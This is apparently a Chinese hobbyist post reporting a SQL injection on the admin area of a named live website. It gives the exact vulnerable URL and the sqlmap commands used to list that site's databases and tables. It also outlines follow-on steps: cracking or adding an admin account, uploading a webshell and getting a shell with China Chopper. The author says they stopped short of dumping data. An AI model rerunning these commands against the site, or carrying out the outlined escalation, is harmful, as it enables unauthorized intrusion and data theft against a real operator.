无意中发现的,官网后台管理地址,有一个页面不需要登录就可以访问
看到参数后的习惯,用sqlmap扫一下吧,果然有惊喜:
测试地址:http://www.kkeye.com/bbacad/downerro.aspx?p=2&jkname=&jkurl=
测试命令:python sqlmap.py -u "http://www.kkeye.com/bbacad/downerro.aspx?jkname=&jkurl=" -p "jkurl" --dbs
测试结果:
除了oracle自带的几个外,还是几个,WEBASP应该是WEB的后台数据库吧,看一下表名
测试命令:python sqlmap.py -u "http://www.kkeye.com/bbacad/downerro.aspx?jkname=&jkurl=" -p "jkurl" --tables -D "WEBASP"
测试结果:
第一次成功使用sqlmap查看到表名,恭喜自己~
参考其它白帽子的习惯,到此为止,不脱裤,不该看的不看。
貌似后续可以破解或增加一个管理员帐号,然后就可以登录WEB操作了;
再然后传大马,上菜刀getshell,不过这些还没有学会,慢慢来。